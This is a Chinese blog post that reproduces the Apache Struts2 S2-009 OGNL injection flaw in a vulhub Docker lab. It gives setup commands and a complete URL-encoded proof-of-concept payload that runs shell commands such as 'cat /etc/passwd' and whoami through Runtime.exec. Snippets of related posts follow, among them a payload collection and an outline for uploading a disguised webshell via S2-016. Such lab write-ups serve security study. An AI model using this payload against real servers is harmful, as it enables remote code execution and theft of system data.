Struts2 S2-009复现

已于 2022-12-21 17:19:21 修改
阅读量192 收藏
点赞数
分类专栏: 漏洞复现 渗透测试 文章标签: struts java 后端
于 2022-12-21 16:53:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZJT6666666/article/details/128399106
版权

1.漏洞描述

Struts2对S2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;后来Struts2对S2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。

但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/helloword.acton?example=<OGNL statement>&(example)('xxx')=1的方法来执行它,从而绕过官方对#、\等特殊字符的防御。

  • 影响版本Struts 2.1.0-2.3.1.1

2.漏洞搭建

采用docker方式搭建,使用vulhub。

通过cd命令进入达到vulhub的靶场文件的位置。

通过以下命令启动环境

docker-compose build
docker-compose up -d 

 通过ps查看端口号

访问搭建的环境(这种就代表环境搭建成功)

3.复现

漏洞所在位置:/ajax/example5

poc:

age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec("[命令]").getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]

构建poc例子:

?age=12313&name=(%23context["xwork.MethodAccessor.denyMethodExecution"]=+new+java.lang.Boolean(false),+%23_memberAccess["allowStaticMethodAccess"]=true,+%23a=@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)('meh')]

有时候访问成功后会弹出一个下载文件,该文件里保存了命令执行结果

例如执行whoami:

复现成功。

你能拿我咋的
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
08-01
Struts2 最新漏洞 S2-016、S2-017 修补方案 Struts2 是一个基于 Java 的 Web 应用程序框架,由 Apache 软件基金会维护。最近,Struts2 发生了两个严重的漏洞,分别是 S2-016 和 S2-017,这两个漏洞可能会导致攻击者...
Struts2-S2-029漏洞分析1
08-08
Struts2-S2-029漏洞是一个严重的问题,它涉及到OGNL(Object-Graph Navigation Language)表达式在Struts2框架中的不安全处理。此漏洞的根本原因是开发人员在处理OGNL表达式中的赋值操作时,错误地编写了判断条件,...
Apache Struts2远程代码执行漏洞(S2-009)
weixin_47493074的博客
09-27 534
Apache Struts2远程代码执行漏洞(S2-009)
Struts2 009 漏洞分析
王嘟嘟的博客
05-28 1334
009是在003以及005的基础上进行了绕过。ParameterInterceptor会对参数进行检测,但是不会对参数的值进行检测,那么就形成了绕过。
struts-s2-009 代码执行(CVE-2011-3923)
最新发布
m0_65150886的博客
01-08 509
但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/HelloWorld.acton?example=&(example)(‘xxx’)=1的方法来执行它,从而绕过官方对#、\等特殊字符的防。Struts2s2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;于是Struts2s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。控制整个网站或者服务器。
墨者Apache Struts2远程代码执行漏洞(S2-009)复现题解
zr1213159840的博客
01-15 736
一共提供了五个链接,每个都点击一下,发现第五个有点特别,点击进去,链接变成了 219.153.49.228:45832/ajax 查找漏洞相关的信息,找到一下链接: https://github.com/vulhub/vulhub/blob/master/struts2/s2-009/README.zh-cn.md 按照链接的指引,我们能找到这个下面还有个页面,访问如下地址: http://219.153.49.228:45832/ajax/example5.action 出现如下页面 接着就是找
0x25. Apache Struts2远程代码执行漏洞(S2-009)复现
qq_31679787的博客
10-18 309
s2-009:OGNL提供了广泛的表达式评估功能等功能。该漏洞允许恶意用户绕过ParametersInterceptor内置的所有保护(正则表达式,拒绝方法调用),从而能够将任何暴露的字符串变量中的恶意表达式注入进行进一步评估。 在S2-003和S2-005中已经解决了类似的行为,但事实证明,基于列入可接受的参数名称的结果修复仅部分地关闭了该漏洞。 ParametersInterceptor中的正...
struts-2.5.16-源码+示例(S2-057漏洞演示环境)
08-24
S2-057漏洞,全称为"Struts2 OGNL注入漏洞",主要源于Struts 2框架处理用户输入时的不当验证和处理。OGNL (Object-Graph Navigation Language) 是一种强大的表达式语言,用于获取和设置Java对象的属性。在Struts 2中...
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
S2-045 漏洞,官方称为“基于Struts2的Content-Type注入”,是在2017年被发现的。这个漏洞存在于Struts2的Jakarta插件中,该插件处理HTTP请求头中的Content-Type字段时存在缺陷。攻击者可以通过精心构造的HTTP请求,...
Struts2之命名空间详解及JSP文件上传了解案例struts009
11-30
参考博文:http://blog.csdn.net/u011638419/article/details/41620213
Struts 2国际化
cmpsky009的博客
07-30 271
一般的框架的国际化都是通过为不同的语言环境提供不同的properties文件来实现的,Struts2也不例外。 Struts2的国际化用的properties文件可以用如下几种方式提供: 1、用与action的class文件同名的properties文件,比如为HelloWorldAction.java的action配置一个HelloWorld.properties的属性文件; 2、
墨者学院-Apache Struts2远程代码执行漏洞(S2-009)复现
JimWu的博客
09-04 1511
Apache Struts2远程代码执行漏洞(S2-009)复现 难易程度:★★ 题目类型:命令执行 使用工具:burpsuite、kali 漏洞原理:允许恶意用户绕过ParametersInterceptor内置的所有保护(正则表达式,拒绝方法调用),从而能够将任何暴露的字符串变量中的恶意表达式注入进行进一步评估。 1.打开靶场,了解S2-009漏洞原理 2.构造poc,执行命令ls,查看文件。...
S2-009 远程代码执行漏洞
EC_Carrot的博客
08-07 843
漏洞简介 影响版本: 2.1.0 - 2.3.1.1 漏洞复现 在vulhub的环境里,example5.action页面里可以传入name参数,向该参数传入poc即可执行命令: GET /ajax/example5?age=12313&name=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowSt
Struts2框架漏洞总结与复现(上) 含Struts2检测工具
剁椒鱼头没剁椒的博客
02-06 6136
如果在配置 Action 中 Result 时使用了重定向类型,并且还使用paramname作为重定向变量,UserAction中定义有一个name变量,当触发redirect类型返回时,Struts2获取使用{name}获取其值,在这个过程中会对name参数的值执行OGNL表达式解析,从而可以插入任何OGNL表达式导致命令执行。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。
Struts2漏洞复现
weixin_51151498的博客
12-14 1179
Struts2漏洞复现
struts2 s2-005/s2-009/s2-013/s2-016/s2-019 payload
weixin_30640291的博客
05-19 426
以下payload仅作整理记录,可以通过修改代码,改为带回显的自己的payload s2-005: ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')((...
009--Struts2中数据封装(属性和模型驱动)及List Map Set集合数据封装
小洋人最happy的专栏
05-14 850
属性驱动 通过属性的set方法 编写jsp表单页面 编写Action 配置struts.xml文件 验证结果 页面提供表达式方式 编写JavaBean文件 编写Action类,接收数据 配置struts.xml 编写JSP文件 验证结果 模型驱动 编写Action类 配置struts.xml 编写JSP 验证结果 Struts2中封装集合类型数据 封装到List集合中...
Struts2 S2-016上传webshell的需求分析
05-25
Struts2 S2-016漏洞是一种文件上传漏洞,攻击者可以通过该漏洞上传恶意代码(如WebShell)到目标服务器,并在服务器上执行该代码,造成严重的安全威胁。 为了成功利用该漏洞,攻击者需要满足以下条件: 1. 目标服务器上安装了Struts2框架。 2. 目标服务器上存在可以上传文件的页面。 3. 目标服务器上存在可以执行上传文件的Action。 因此,攻击者需要进行以下需求分析: 1. 了解目标服务器上是否安装了Struts2框架。 2. 扫描目标服务器,查找可以上传文件的页面。 3. 分析可上传文件的页面中文件上传的代码逻辑。 4. 查找可以执行上传文件的Action。 5. 编写恶意代码,将其伪装成图片或其他常见文件格式,以绕过上传文件类型的限制。 6. 利用漏洞上传恶意代码,并在服务器上执行该代码。 需要注意的是,利用该漏洞进行攻击可能会被追究法律责任,请勿尝试非法入侵。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值